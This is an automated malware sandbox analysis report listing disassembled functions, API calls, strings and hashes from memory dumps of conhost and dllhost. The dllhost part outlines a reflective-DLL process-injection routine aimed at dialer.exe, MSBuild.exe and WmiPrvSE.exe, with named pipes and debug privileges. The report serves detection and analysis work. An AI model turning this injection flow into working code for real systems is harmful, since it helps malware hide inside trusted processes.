                                                                                                    • Source File: 00000029.00000002.2622635464.000001C08C1B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001C08C1B0000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_41_2_1c08c1b0000_conhost.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CurrentThread
                                                                                                    • String ID:
                                                                                                    • API String ID: 2882836952-0
                                                                                                    • Opcode ID: 065eb2a24c7300192409b1f4bca8757e198c759726111ad2bde78b52490ea3d6
                                                                                                    • Instruction ID: 344ad8bf0e9a6006015e167405a76f1eacc6bf37871bfcd31e401b50123bbc01
                                                                                                    • Opcode Fuzzy Hash: 065eb2a24c7300192409b1f4bca8757e198c759726111ad2bde78b52490ea3d6
                                                                                                    • Instruction Fuzzy Hash: 1602BA36659B84C6EB61CB55E49479AB7B0F3C9B94F108115FA8E87BA8DB7CC844CF00
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000029.00000002.2622635464.000001C08C1B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001C08C1B0000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_41_2_1c08c1b0000_conhost.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ConsoleErrorLastMode_invalid_parameter_noinfo
                                                                                                    • String ID:
                                                                                                    • API String ID: 2210144848-0
                                                                                                    • Opcode ID: 4bcbd420be841bafcf1cb86917f82a61becb6801fc8ef256a9047459a88e7092
                                                                                                    • Instruction ID: ebb780385b416941e021a986b8ed1aa0490e2eae583c8db18d2a8713296bc03d
                                                                                                    • Opcode Fuzzy Hash: 4bcbd420be841bafcf1cb86917f82a61becb6801fc8ef256a9047459a88e7092
                                                                                                    • Instruction Fuzzy Hash: BD818C32ED0A50C9FF529B65A8C0BED66B0B75EF98F44C116EE0A53B92DA34C852C710
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000029.00000002.2622635464.000001C08C1B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001C08C1B0000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_41_2_1c08c1b0000_conhost.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CurrentThread
                                                                                                    • String ID:
                                                                                                    • API String ID: 2882836952-0
                                                                                                    • Opcode ID: 94d32eef5ebe536b0a0adfa3e0b32a568b4410008b4bb6dfd84b7e083660618c
                                                                                                    • Instruction ID: a48dfd084f24eeba5f78e6aa4ba0e3d7a9cb9914d148ff914a0508497b5571ab
                                                                                                    • Opcode Fuzzy Hash: 94d32eef5ebe536b0a0adfa3e0b32a568b4410008b4bb6dfd84b7e083660618c
                                                                                                    • Instruction Fuzzy Hash: FE61B636959A40C6FB619B16E4D4B5AB7B0F389F64F108115FA8D87BA8DB78C850CF40
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000029.00000002.2622576710.000001C08C180000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001C08C180000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_41_2_1c08c180000_conhost.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _set_statfp
                                                                                                    • String ID:
                                                                                                    • API String ID: 1156100317-0
                                                                                                    • Opcode ID: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
                                                                                                    • Instruction ID: 3e0fa857876e647ba3988a29b7ea30bc3eb8bf1035d8a47ad9205eea176dc5cb
                                                                                                    • Opcode Fuzzy Hash: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
                                                                                                    • Instruction Fuzzy Hash: C011B232EC4A4081FE561165E4F1BE988706B5EF74EF8C624AA7706BE68A74CECA4100
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000029.00000002.2622635464.000001C08C1B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001C08C1B0000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_41_2_1c08c1b0000_conhost.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _set_statfp
                                                                                                    • String ID:
                                                                                                    • API String ID: 1156100317-0
                                                                                                    • Opcode ID: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
                                                                                                    • Instruction ID: e79aa12d09970ef45f246943e9e058c6acfc310bfd68157b3ba34990b548b3b3
                                                                                                    • Opcode Fuzzy Hash: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
                                                                                                    • Instruction Fuzzy Hash: 8C11C632ED4A10C2FF9B1164E4D6BE591706B6FF74F24C6A4BA76063D78B54CC464110
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000029.00000002.2622635464.000001C08C1B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001C08C1B0000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_41_2_1c08c1b0000_conhost.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CurrentProcessProtectVirtual$HandleModule
                                                                                                    • String ID:
                                                                                                    • API String ID: 1092925422-0
                                                                                                    • Opcode ID: a6312042db82c9c62213c4cc61283d131af5cc2d1631b4a6c699d8a5d8d1a662
                                                                                                    • Instruction ID: c21a14b13518c81a0b7c6ebe81f7f2a2005c5366c57269f4ac58e0e52a0fad15
                                                                                                    • Opcode Fuzzy Hash: a6312042db82c9c62213c4cc61283d131af5cc2d1631b4a6c699d8a5d8d1a662
                                                                                                    • Instruction Fuzzy Hash: 84113036B44B40C6FF559B11F444ADA6670F74AF94F848125EE8907794EF3DC915CB00
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000029.00000002.2622576710.000001C08C180000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001C08C180000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_41_2_1c08c180000_conhost.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CurrentImageNonwritable__except_validate_context_record
                                                                                                    • String ID: csm$f
                                                                                                    • API String ID: 3242871069-629598281
                                                                                                    • Opcode ID: a12096fde07cdb9e3353675e9d74aeeedb8b2868f95cbc04e37ad4e594267797
                                                                                                    • Instruction ID: 96398448fd515df88f7a1e0bb9a55d4f0522d71a23098a0d5fb081f7adcf21b1
                                                                                                    • Opcode Fuzzy Hash: a12096fde07cdb9e3353675e9d74aeeedb8b2868f95cbc04e37ad4e594267797
                                                                                                    • Instruction Fuzzy Hash: 23518A32A5A600CAFF56DF25E884F9977B5F34AF98F61C134DA0647B88EB34D9428704
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000029.00000002.2622576710.000001C08C180000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001C08C180000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_41_2_1c08c180000_conhost.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CurrentImageNonwritable__except_validate_context_record
                                                                                                    • String ID: csm$f
                                                                                                    • API String ID: 3242871069-629598281
                                                                                                    • Opcode ID: 9d9690251bde7e8cf310a92dbdf710b9b231990aa6f8d8297185bd8ead255550
                                                                                                    • Instruction ID: 8d0156832d12fb02214fb0a0f7cfca8223e1dff1ddf7bb1fa61f8d785975672a
                                                                                                    • Opcode Fuzzy Hash: 9d9690251bde7e8cf310a92dbdf710b9b231990aa6f8d8297185bd8ead255550
                                                                                                    • Instruction Fuzzy Hash: FC31AB72A55750C6FB16DF12E884F997BB4F74AF88F55C024AE4A07B88CB38C941C708
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000029.00000002.2622635464.000001C08C1B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001C08C1B0000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_41_2_1c08c1b0000_conhost.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Heap$Process$Free
                                                                                                    • String ID:
                                                                                                    • API String ID: 3168794593-0
                                                                                                    • Opcode ID: 5f7cef85691391bfd1f64b5ed8b2db0144129af346a3a3b2b5e725a5d1a6a2a2
                                                                                                    • Instruction ID: f1d0d8f4a793d91c2880f28ec54817c5319b8426b157ab58439670ea49b9caae
                                                                                                    • Opcode Fuzzy Hash: 5f7cef85691391bfd1f64b5ed8b2db0144129af346a3a3b2b5e725a5d1a6a2a2
                                                                                                    • Instruction Fuzzy Hash: BF118B72994B88DAFB52DF66A88469AB370F78FF80F448019EB8A03714DF38C4119700
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000029.00000002.2622635464.000001C08C1B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001C08C1B0000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_41_2_1c08c1b0000_conhost.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: FileType
                                                                                                    • String ID: \\.\pipe\
                                                                                                    • API String ID: 3081899298-91387939
                                                                                                    • Opcode ID: 6e49d471cca68daba176b61e5ee439cd114eed484b1fe0d421767ac79cd7910d
                                                                                                    • Instruction ID: 3b2f22704a888ccc60d34976356636e7e9bd5e0404c5a51c02f36bd932a40bc9
                                                                                                    • Opcode Fuzzy Hash: 6e49d471cca68daba176b61e5ee439cd114eed484b1fe0d421767ac79cd7910d
                                                                                                    • Instruction Fuzzy Hash: BF71B532A80781C5FFA69E2599D47EAA7B0F74EFE4F848016DD4947B88DE35CD088B00
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000029.00000002.2622635464.000001C08C1B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001C08C1B0000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_41_2_1c08c1b0000_conhost.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: FileType
                                                                                                    • String ID: \\.\pipe\
                                                                                                    • API String ID: 3081899298-91387939
                                                                                                    • Opcode ID: afcb3e66faa42eb2bcf346096e8e020fbdcda90173b34b97db97a4810a61a98e
                                                                                                    • Instruction ID: 1fae472cd148a7122e902f486fe42aa3b10125c1922c864887bcf31fd6e01267
                                                                                                    • Opcode Fuzzy Hash: afcb3e66faa42eb2bcf346096e8e020fbdcda90173b34b97db97a4810a61a98e
                                                                                                    • Instruction Fuzzy Hash: 6251CA32A84782C1FEA69E2595D4BEA6671F78FFA0F91C015DD4543B9ACE35CC0A8F40
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000029.00000002.2622635464.000001C08C1B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001C08C1B0000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_41_2_1c08c1b0000_conhost.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ErrorFileLastWrite
                                                                                                    • String ID: U
                                                                                                    • API String ID: 442123175-4171548499
                                                                                                    • Opcode ID: a13edceeabc266f7553562aa63bd5b4e25a5c0a5c0c842b56dee7ecd57ba2728
                                                                                                    • Instruction ID: 469ea6887b1db5a38fa66ae233ae99f3eb043d73cfebc237d68f28c7adfa837e
                                                                                                    • Opcode Fuzzy Hash: a13edceeabc266f7553562aa63bd5b4e25a5c0a5c0c842b56dee7ecd57ba2728
                                                                                                    • Instruction Fuzzy Hash: C741B132A54A80C1EF219F25F4847DA67B0F38DF94F408025EE8D87788EB38C451CB40
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000029.00000002.2622635464.000001C08C1B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001C08C1B0000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_41_2_1c08c1b0000_conhost.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Stringtry_get_function
                                                                                                    • String ID: LCMapStringEx
                                                                                                    • API String ID: 2588686239-3893581201
                                                                                                    • Opcode ID: 8d086b69a67710f16bbac061c243311228bfa9ac644515e4c5b930ef6255b9c6
                                                                                                    • Instruction ID: 370a337db889b87330e4e0902ea49a54805815d51a6ed795863f8e5de2afeb7d
                                                                                                    • Opcode Fuzzy Hash: 8d086b69a67710f16bbac061c243311228bfa9ac644515e4c5b930ef6255b9c6
                                                                                                    • Instruction Fuzzy Hash: 3D11F936648B80C6EB659B56B4806DAB7B4F78EB94F548126EE8D43B59DF38C450CB00
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000029.00000002.2622635464.000001C08C1B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001C08C1B0000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_41_2_1c08c1b0000_conhost.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ExceptionFileHeaderRaise
                                                                                                    • String ID: csm
                                                                                                    • API String ID: 2573137834-1018135373
                                                                                                    • Opcode ID: 9d9897ce25571c28e51806bf44cef2494793ace286fcfb8ca6bb858d3561ec5c
                                                                                                    • Instruction ID: e9e47521ecaddf524cb29c51cb963f76b94d5de40e2d830c3b7c03ff89c9bdff
                                                                                                    • Opcode Fuzzy Hash: 9d9897ce25571c28e51806bf44cef2494793ace286fcfb8ca6bb858d3561ec5c
                                                                                                    • Instruction Fuzzy Hash: 07113D32648B80C2EF628B15E580699B7B4F789F98F588221EE8D07764DF38C952CB00
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000029.00000002.2622635464.000001C08C1B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001C08C1B0000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_41_2_1c08c1b0000_conhost.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CountCriticalInitializeSectionSpintry_get_function
                                                                                                    • String ID: InitializeCriticalSectionEx
                                                                                                    • API String ID: 539475747-3084827643
                                                                                                    • Opcode ID: 84d4d9e5c8567b0c470c1df2abda769c6c41ef7958af45e9a0e3fb38bbb318e4
                                                                                                    • Instruction ID: ac1fe51396398c37e6705911e8c5ef4bfef2c1ec3be8e2d5248814bbace480af
                                                                                                    • Opcode Fuzzy Hash: 84d4d9e5c8567b0c470c1df2abda769c6c41ef7958af45e9a0e3fb38bbb318e4
                                                                                                    • Instruction Fuzzy Hash: B5F08235B94B80D1FF0AAB42F4C0AE56331EB8DF90F58D025B95903B58CE38C995DB11
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000029.00000002.2622576710.000001C08C180000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001C08C180000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_41_2_1c08c180000_conhost.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: try_get_function
                                                                                                    • String ID: November$October
                                                                                                    • API String ID: 2742660187-1636048786
                                                                                                    • Opcode ID: fdce6644ec914193c36bb80fdc4676b7f0aefee418b5ba3fb3fb30fec7b157a7
                                                                                                    • Instruction ID: 1fef6bb2e39cc4d4cd736540549228ae1b831546fd21886e26a19a9fbb4045c1
                                                                                                    • Opcode Fuzzy Hash: fdce6644ec914193c36bb80fdc4676b7f0aefee418b5ba3fb3fb30fec7b157a7
                                                                                                    • Instruction Fuzzy Hash: 76E09231F98941D2FE079B51F4E0AE46631EBAEF84F99D032951906356CE38C88A9340
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000029.00000002.2622635464.000001C08C1B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001C08C1B0000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_41_2_1c08c1b0000_conhost.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Valuetry_get_function
                                                                                                    • String ID: FlsSetValue
                                                                                                    • API String ID: 738293619-3750699315
                                                                                                    • Opcode ID: 50ddf312d192e0080d8f7be73491643e669436d55e40d94a578a073710abe0d4
                                                                                                    • Instruction ID: 0641310f9fe7d9f924b52d62cf3a0baaacd80d8cc48479f7e102cd1dc34bfffd
                                                                                                    • Opcode Fuzzy Hash: 50ddf312d192e0080d8f7be73491643e669436d55e40d94a578a073710abe0d4
                                                                                                    • Instruction Fuzzy Hash: 8AE06D71A84641D1FE0B6B50F8C0EE46332AB8EF80F98D022E91906399CE38C895CB10
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000029.00000002.2622635464.000001C08C1B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001C08C1B0000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_41_2_1c08c1b0000_conhost.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Heap$Process$AllocFree
                                                                                                    • String ID:
                                                                                                    • API String ID: 756756679-0
                                                                                                    • Opcode ID: 3779bcfafb90e2edd239bdf2c4b5cd58a413f829d06d4561fa4d45091366f8f0
                                                                                                    • Instruction ID: 62222a58e76ea9e93c317499d47783acd31dac5d70bbdc91d5f302dd5aa9c3df
                                                                                                    • Opcode Fuzzy Hash: 3779bcfafb90e2edd239bdf2c4b5cd58a413f829d06d4561fa4d45091366f8f0
                                                                                                    • Instruction Fuzzy Hash: 4A217432A44B80C5FE138F5AA4846DAF3B0FB8AFA4F558110EE8C47B14EB78C5528700
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000029.00000002.2622635464.000001C08C1B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001C08C1B0000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_41_2_1c08c1b0000_conhost.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Heap$AllocProcess
                                                                                                    • String ID:
                                                                                                    • API String ID: 1617791916-0
                                                                                                    • Opcode ID: 8b038beba27963a8280261039ce2f03ebd498cc74250c16b652da3202c115688
                                                                                                    • Instruction ID: 52254514f7b25f670cacc11c815c05f0be9b80ae36f693b5cbf099b22c12b742
                                                                                                    • Opcode Fuzzy Hash: 8b038beba27963a8280261039ce2f03ebd498cc74250c16b652da3202c115688
                                                                                                    • Instruction Fuzzy Hash: 09E039B1A91600CAFB068B62D8447C936F1EB8EF01F88C024C90907350DF7DC499E740
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000002A.00000002.2948240285.0000000140000000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_42_2_140000000_dllhost.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Create$Process$Close$CurrentHandleResource$ConditionFileMaskSecurityThread$DescriptorFreeModuleOpenTokenValue$AdjustAllocConvertErrorFindHeapInfoInformationLastLibraryLoadLocalLockLookupMappingPrivilegePrivilegesSizeofSleepStringVerifyVersionViewlstrcmpi
                                                                                                    • String ID: D:(A;OICI;GA;;;AU)(A;OICI;GA;;;BA)$DLL$SOFTWARE\dialerconfig$SeDebugPrivilege$kernel32.dll$ntdll.dll$pid$svc64
                                                                                                    • API String ID: 2037067350-1130149537
                                                                                                    • Opcode ID: 64f5cfc841401fc1be0d0af11d06bbf6443494d40dab24e71934df2300a70ca7
                                                                                                    • Instruction ID: 0064b04b83878bd10eab50581479d2885e909b86cf7cbb7bba4562e6e6b3f351
                                                                                                    • Opcode Fuzzy Hash: 64f5cfc841401fc1be0d0af11d06bbf6443494d40dab24e71934df2300a70ca7
                                                                                                    • Instruction Fuzzy Hash: D5A1F7B6205B8196EB26CF62F8547DA73A9F78C794F40412AEB4A47B74DF38C549CB00

                                                                                                    Control-flow Graph

                                                                                                    control_flow_graph 28 1400010c0-140001110 call 1400019ac 31 1400014c5-1400014e1 28->31 32 140001116-14000111c 28->32 32->31 33 140001122-140001138 OpenProcess 32->33 33->31 34 14000113e-14000115b OpenProcess 33->34 35 140001161-140001178 K32GetModuleFileNameExW 34->35 36 140001208-140001229 NtQueryInformationProcess 34->36 37 1400011aa-1400011b6 CloseHandle 35->37 38 14000117a-140001195 PathFindFileNameW lstrlenW 35->38 39 1400014bc-1400014bf CloseHandle 36->39 40 14000122f-140001235 36->40 37->36 42 1400011b8-1400011df 37->42 38->37 41 140001197-1400011a7 StrCpyW 38->41 39->31 40->39 43 14000123b-140001253 OpenProcessToken 40->43 41->37 44 1400011e3-1400011f5 StrCmpIW 42->44 43->39 45 140001259-14000127f GetTokenInformation 43->45 44->39 46 1400011fb-140001206 44->46 47 140001281-14000128a GetLastError 45->47 48 1400012fc 45->48 46->36 46->44 47->48 50 14000128c-1400012a0 LocalAlloc 47->50 49 140001303-140001311 CloseHandle 48->49 49->39 52 140001317-14000131e 49->52 50->48 51 1400012a2-1400012c8 GetTokenInformation 50->51 53 1400012ea 51->53 54 1400012ca-1400012e8 GetSidSubAuthorityCount GetSidSubAuthority 51->54 52->39 55 140001324-14000132f 52->55 56 1400012f1-1400012fa LocalFree 53->56 54->56 55->39 57 140001335-14000133f 55->57 56->49 57->39 58 140001345-14000134f 57->58 58->39 59 140001355-140001395 call 140002010 * 3 58->59 59->39 66 14000139b-1400013bb call 140002010 StrStrA 59->66 69 1400013d3-1400013f8 call 140002010 * 2 66->69 70 1400013bd-1400013cc 66->70 69->39 76 1400013fe-140001425 VirtualAllocEx 69->76 70->66 71 1400013ce 70->71 71->39 76->39 77 14000142b-140001444 WriteProcessMemory 76->77 77->39 78 140001446-140001468 call 1400018f8 77->78 78->39 81 14000146a-140001472 78->81 81->39 82 140001474-14000147a 81->82 83 140001483-140001490 WaitForSingleObject 82->83 84 14000147c-140001481 82->84 86 1400014b1 83->86 87 140001492-1400014a6 GetExitCodeThread 83->87 85 1400014b6 CloseHandle 84->85 85->39 86->85 87->86 88 1400014a8-1400014ae 87->88 88->86
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000002A.00000002.2948240285.0000000140000000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_42_2_140000000_dllhost.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Process$CloseHandle$Open$InformationToken$AllocAuthorityFileLocalName$CodeCountErrorExitFindFreeLastMemoryModuleObjectPathQuerySingleThreadVirtualWaitWow64Writelstrlen
                                                                                                    • String ID: @$MSBuild.exe$ReflectiveDllMain$WmiPrvSE.exe$dialer.exe
                                                                                                    • API String ID: 2561231171-2835194517
                                                                                                    • Opcode ID: 544d3209d9aa9e6ba5ca7d9f2d2eefc3a9e0a6ddaab6f3d4a2b6f9620268a1a8
                                                                                                    • Instruction ID: 0a012d2709ccf7208303dd358812dcfe6bb15dc6c01bade59f112586625c8404
                                                                                                    • Opcode Fuzzy Hash: 544d3209d9aa9e6ba5ca7d9f2d2eefc3a9e0a6ddaab6f3d4a2b6f9620268a1a8
                                                                                                    • Instruction Fuzzy Hash: D5B138B5204A8186EB66DF23F8947EA37A5FB8CBC4F444129AB4A477B4EF38C545C740

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000002A.00000002.2948240285.0000000140000000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_42_2_140000000_dllhost.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Heap$Process$Free$AllocEnum$CloseHandleMemoryModulesOpenProcessesRead
                                                                                                    • String ID:
                                                                                                    • API String ID: 2256533027-0
                                                                                                    • Opcode ID: 0c5f04347bf6d44913e8b334837d31c7522880c0df581b7b1d3a354cacd3bc02
                                                                                                    • Instruction ID: cf9341a8fd9423d084aaaa6a7d8b3b80e2bc7ab402b56fb27a3eccdf8bc85af4
                                                                                                    • Opcode Fuzzy Hash: 0c5f04347bf6d44913e8b334837d31c7522880c0df581b7b1d3a354cacd3bc02
                                                                                                    • Instruction Fuzzy Hash: D7519AB2711A809AEB66CF63E8587EA22A4F78DBD4F444025EF4A47764DF38C546C700

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000002A.00000002.2948240285.0000000140000000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_42_2_140000000_dllhost.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: DescriptorInitializeSecurity$AllocAllocateCreateDaclEntriesLocalNamedPipe
                                                                                                    • String ID:
                                                                                                    • API String ID: 3197395349-0
                                                                                                    • Opcode ID: 81527eae8623b787a181e0c46c37d2868846c75f5fa2d30b1d243af947967be4
                                                                                                    • Instruction ID: a570fa145803e090d44eaa55ab4984397cb03076929b2479bb4bcc3b6287667e
                                                                                                    • Opcode Fuzzy Hash: 81527eae8623b787a181e0c46c37d2868846c75f5fa2d30b1d243af947967be4
                                                                                                    • Instruction Fuzzy Hash: D0415BB2611B50CAE761CF25E4807DD37B4F788B98F40512AFB4947BA8EB78C548CB40

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000002A.00000002.2948240285.0000000140000000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_42_2_140000000_dllhost.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: FileHandle$CloseCreateModuleProtectVirtual$CurrentFreeInformationLibraryMappingProcessViewlstrcmpi
                                                                                                    • String ID: .text$C:\Windows\System32\
                                                                                                    • API String ID: 2721474350-832442975
                                                                                                    • Opcode ID: 5b6459bf4908e158894d0240be6af7c22007f1fef7840f3adad859f1057e7803
                                                                                                    • Instruction ID: 2464ff5d4c2995b64bfe096b2c39054b9f3fe2b2a0584e2ea435aa32f698c122
                                                                                                    • Opcode Fuzzy Hash: 5b6459bf4908e158894d0240be6af7c22007f1fef7840f3adad859f1057e7803
                                                                                                    • Instruction Fuzzy Hash: 6B513B76205A8092EB62DB52F858BDA73A5F78CBD8F444121EF4A07BA4DF38C509C700

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000002A.00000002.2948240285.0000000140000000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_42_2_140000000_dllhost.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: NamedPipe$DescriptorFileInitializeSecuritySleep$AllocAllocateConnectCreateDaclDisconnectEntriesLocalReadWrite
                                                                                                    • String ID: M$\\.\pipe\dialerchildproc64
                                                                                                    • API String ID: 2203880229-3489460547
                                                                                                    • Opcode ID: 1e8405c3ce3dc3a450943935d6232c4767fdbc18e1eae9273363d4fc7ca69f3e
                                                                                                    • Instruction ID: 5a68bd608a4fc6ab7431ec29ead35fd15cf77d15c46470c812ff7ab5360699ad
                                                                                                    • Opcode Fuzzy Hash: 1e8405c3ce3dc3a450943935d6232c4767fdbc18e1eae9273363d4fc7ca69f3e
                                                                                                    • Instruction Fuzzy Hash: D61139B1214A8092E616DB22F8247E96364E78DBE0F444225FB5A476F4CF7CC948C700

                                                                                                    Control-flow Graph

                                                                                                    Control-flow graph of function at 14000228c (calls: ConnectNamedPipe, Sleep, ReadFile, DisconnectNamedPipe; subcall 140001c64)
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000002A.00000002.2948240285.0000000140000000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_42_2_140000000_dllhost.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: NamedPipe$DescriptorInitializeSecuritySleep$AllocAllocateConnectCreateDaclDisconnectEntriesFileLocalRead
                                                                                                    • String ID: \\.\pipe\dialercontrol_redirect64
                                                                                                    • API String ID: 2071455217-3440882674
                                                                                                    • Opcode ID: e726fb2786c7da4def9263b705b77f3199000bde839af328c4a314f779c2dbfb
                                                                                                    • Instruction ID: 0d2beb54c5ceebdf84b80fb0b47548936abf997febc99fd47e2414f2e50ad015
                                                                                                    • Opcode Fuzzy Hash: e726fb2786c7da4def9263b705b77f3199000bde839af328c4a314f779c2dbfb
                                                                                                    • Instruction Fuzzy Hash: 61012CB121464092FA17DB63F8543EAA364A78DBE1F548224FB66076F4CF7CC548C700

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000002A.00000002.2948240285.0000000140000000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
